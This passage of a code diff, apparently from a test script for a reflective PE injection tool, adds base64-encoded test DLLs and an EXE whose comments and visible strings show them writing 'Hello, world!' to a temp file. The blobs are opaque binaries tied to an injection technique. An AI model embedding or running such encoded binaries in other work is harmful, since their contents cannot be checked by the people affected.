+	$Encoded64BitStringDll = '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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAADAAAABCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=='
+	$Encoded32BitStringDll = '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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAADAAAABEwAAAAIAAADAAAABAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=='
+
+	# A bare bones test harness DLL that simply writes "Hello, world!" to %TEMP%\testoutput.txt upon having VoidFunc called
+	$Encoded64BitVoidDll = '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'
+	$Encoded32BitVoidDll = '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'
+
+	# A bare bones test harness EXE that simply writes "Hello, world! (EXE ARGS)" to %TEMP%\testoutput.txt
+	$Encoded64BitExe = 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAADVAnyTkWMSwJFjEsCRYxLA1zLPwJNjEsDXMvLAnmMSwNcy88CTYxLAmBuBwJJjEsCRYxPAs2MSwLMa9sCQYxLAsxrMwJBjEsBSaWNokWMSwAAAAAAAAAAAAAAAAAAAAABQRQAAZIYFAIC2PlYAAAAAAAAAAPAAIgALAgwAAAoAAAAOAAAAAAAAMBQAAAAQAAAAAABAAQAAAAAQAAAAAgAABQACAAAAAAAFAAIAAAAAAABgAAAABAAAAAAAAAMAYIEAABAAAAAAAAAQAAAAAAAAAAAQAAAAAAAAEAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAUIwAAPAAAAAAAAAAAAAAAAEAAAOQAAAAAAAAAAAAAAABQAAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwIQAAcAAAAAAAAAAAAAAAACAAACABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAADsIAAAAEAAAAAoAAAAEAAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAAC8BgAAACAAAAAIAAAADgAAAAAAAAAAAAAAAAAAQAAAQC5kYXRhAAAAgAAAAAAwAAAAAgAAABYAAAAAAAAAAAAAAAAAAEAAAMAucGRhdGEAAOQAAAAAQAAAAAIAAAAYAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAUAAAAAFAAAAACAAAAGgAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEyL3FNVVkiB7FABAACLB